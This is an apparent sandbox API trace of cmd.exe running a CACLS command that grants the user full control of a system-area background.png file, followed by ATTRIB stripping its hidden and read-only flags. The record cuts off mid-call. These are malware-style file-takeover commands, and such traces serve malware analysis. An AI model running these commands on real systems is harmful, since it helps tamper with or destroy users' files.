(_Type=0x1) [0149.134] __p__fmode () returned 0x76b331f4 [0149.134] __p__commode () returned 0x76b331fc [0149.134] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0149.134] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0149.134] GetCurrentThreadId () returned 0x390 [0149.135] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x390) returned 0x38 [0149.135] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.135] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0149.135] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.135] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0149.135] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fd34 | out: phkResult=0x14fd34*=0x0) returned 0x2 [0149.135] VirtualQuery (in: lpAddress=0x14fd6b, lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.135] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0149.135] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0149.135] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x53000, 
AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.135] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0149.135] GetConsoleOutputCP () returned 0x1b5 [0149.135] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.135] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0149.135] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.135] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0149.135] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.135] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.136] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.136] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.136] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.136] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.136] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0149.136] GetEnvironmentStringsW () returned 0x170380* [0149.136] FreeEnvironmentStringsW (penv=0x170380) returned 1 [0149.136] GetEnvironmentStringsW () returned 0x170380* [0149.136] FreeEnvironmentStringsW (penv=0x170380) returned 1 [0149.137] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14eca4 | out: phkResult=0x14eca4*=0x40) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x30, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] 
RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x1, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x1, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x0, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x40, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x40, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x40, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegCloseKey (hKey=0x40) returned 0x0 [0149.137] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14eca4 | out: phkResult=0x14eca4*=0x40) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x40, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", 
lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x1, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x1, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x0, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x9, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x9, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x9, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegCloseKey (hKey=0x40) returned 0x0 [0149.137] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886377 [0149.137] srand (_Seed=0x5b886377) [0149.137] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"" [0149.138] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"" [0149.138] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.138] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x171ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0149.138] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.138] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.138] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.138] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0149.138] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0149.138] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0149.138] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0149.138] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0149.138] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0149.139] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0149.139] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0149.139] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0149.139] GetEnvironmentStringsW () returned 0x1724d0* [0149.139] FreeEnvironmentStringsW (penv=0x1724d0) returned 1 [0149.139] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.139] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.139] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0149.139] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0149.139] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0149.139] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0149.139] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0149.139] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0149.139] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0149.139] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0149.139] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fa70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.139] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14fa70, lpFilePart=0x14fa6c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14fa6c*="Desktop") returned 0x18 [0149.139] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.139] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f7ec | out: lpFindFileData=0x14f7ec) returned 0x170b60 [0149.140] FindClose (in: hFindFile=0x170b60 | out: hFindFile=0x170b60) returned 1 [0149.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f7ec | out: lpFindFileData=0x14f7ec) returned 0x170b60 [0149.140] FindClose (in: hFindFile=0x170b60 | out: hFindFile=0x170b60) returned 1 [0149.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f7ec | out: lpFindFileData=0x14f7ec) returned 0x170b60 [0149.140] FindClose (in: hFindFile=0x170b60 | out: hFindFile=0x170b60) returned 1 [0149.140] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.140] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0149.140] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0149.140] GetEnvironmentStringsW () returned 0x170380* [0149.140] FreeEnvironmentStringsW (penv=0x170380) returned 1 [0149.140] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.141] GetConsoleOutputCP () returned 0x1b5 [0149.141] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.141] GetUserDefaultLCID () returned 0x409 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fbb0, cchData=128 | out: lpLCData="0") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fbb0, cchData=128 | out: lpLCData="0") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fbb0, cchData=128 | out: lpLCData="1") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0149.142] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0149.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0149.142] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0149.142] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0149.142] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0149.142] GetConsoleTitleW (in: lpConsoleTitle=0x160a08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.143] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0149.143] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0149.143] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0149.143] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0149.144] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0149.144] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0149.144] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0149.144] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0149.144] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0149.144] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0149.144] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0149.193] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0149.193] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0149.193] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0149.193] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0149.193] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0149.193] _wcsicmp 
(_String1="REM", _String2="ATTRIB") returned 17 [0149.193] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0149.197] SetErrorMode (uMode=0x0) returned 0x0 [0149.197] SetErrorMode (uMode=0x1) returned 0x0 [0149.197] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x172028, lpFilePart=0x14f364 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f364*="Desktop") returned 0x18 [0149.197] SetErrorMode (uMode=0x0) returned 0x1 [0149.197] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.197] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.202] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.202] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.203] GetLastError () returned 0x2 [0149.203] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.203] GetLastError () returned 0x2 [0149.203] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0x160f68 [0149.203] FindClose (in: hFindFile=0x160f68 | out: hFindFile=0x160f68) returned 1 [0149.203] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x14f0e0) returned 0xffffffff [0149.203] GetLastError () returned 0x2 [0149.203] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0x160f68 [0149.204] FindClose (in: hFindFile=0x160f68 | out: hFindFile=0x160f68) returned 1 [0149.204] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0149.204] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0149.204] GetConsoleTitleW (in: lpConsoleTitle=0x14f5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.204] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f460, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f528 | out: lpAttributeList=0x14f460, lpSize=0x14f528) returned 1 [0149.204] UpdateProcThreadAttribute (in: lpAttributeList=0x14f460, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f520, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f460, lpPreviousValue=0x0) returned 1 [0149.204] GetStartupInfoW (in: lpStartupInfo=0x14f41c | out: lpStartupInfo=0x14f41c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0149.204] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0149.205] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", 
lpStartupInfo=0x14f4bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f508 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x14f508*(hProcess=0x50, hThread=0x4c, dwProcessId=0xca4, dwThreadId=0xc24)) returned 1 [0149.207] CloseHandle (hObject=0x4c) returned 1 [0149.207] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0149.207] GetEnvironmentStringsW () returned 0x1704f0* [0149.208] FreeEnvironmentStringsW (penv=0x1704f0) returned 1 [0149.208] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0149.395] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x14f3fc | out: lpExitCode=0x14f3fc*=0x0) returned 1 [0149.395] CloseHandle (hObject=0x50) returned 1 [0149.395] _vsnwprintf (in: _Buffer=0x14f544, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f408 | out: _Buffer="00000000") returned 8 [0149.395] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.395] GetEnvironmentStringsW () returned 0x172320* [0149.395] FreeEnvironmentStringsW (penv=0x172320) returned 1 [0149.395] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.395] GetEnvironmentStringsW () returned 0x172320* [0149.396] FreeEnvironmentStringsW (penv=0x172320) returned 1 [0149.396] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f460 | out: lpAttributeList=0x14f460) [0149.396] GetConsoleTitleW (in: lpConsoleTitle=0x14f844, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.396] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.396] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.396] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.396] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.396] GetLastError () returned 0x2 [0149.396] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.397] GetLastError () returned 0x2 [0149.397] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0x16e550 [0149.397] FindClose (in: hFindFile=0x16e550 | out: hFindFile=0x16e550) returned 1 [0149.397] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.397] GetLastError () returned 0x2 [0149.397] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0x16e550 [0149.397] FindClose (in: hFindFile=0x16e550 | out: hFindFile=0x16e550) returned 1 
[0149.397] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0149.397] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0149.397] GetConsoleTitleW (in: lpConsoleTitle=0x14f5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.397] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f460, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f528 | out: lpAttributeList=0x14f460, lpSize=0x14f528) returned 1 [0149.397] UpdateProcThreadAttribute (in: lpAttributeList=0x14f460, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f520, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f460, lpPreviousValue=0x0) returned 1 [0149.397] GetStartupInfoW (in: lpStartupInfo=0x14f41c | out: lpStartupInfo=0x14f41c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0149.397] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0149.397] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H 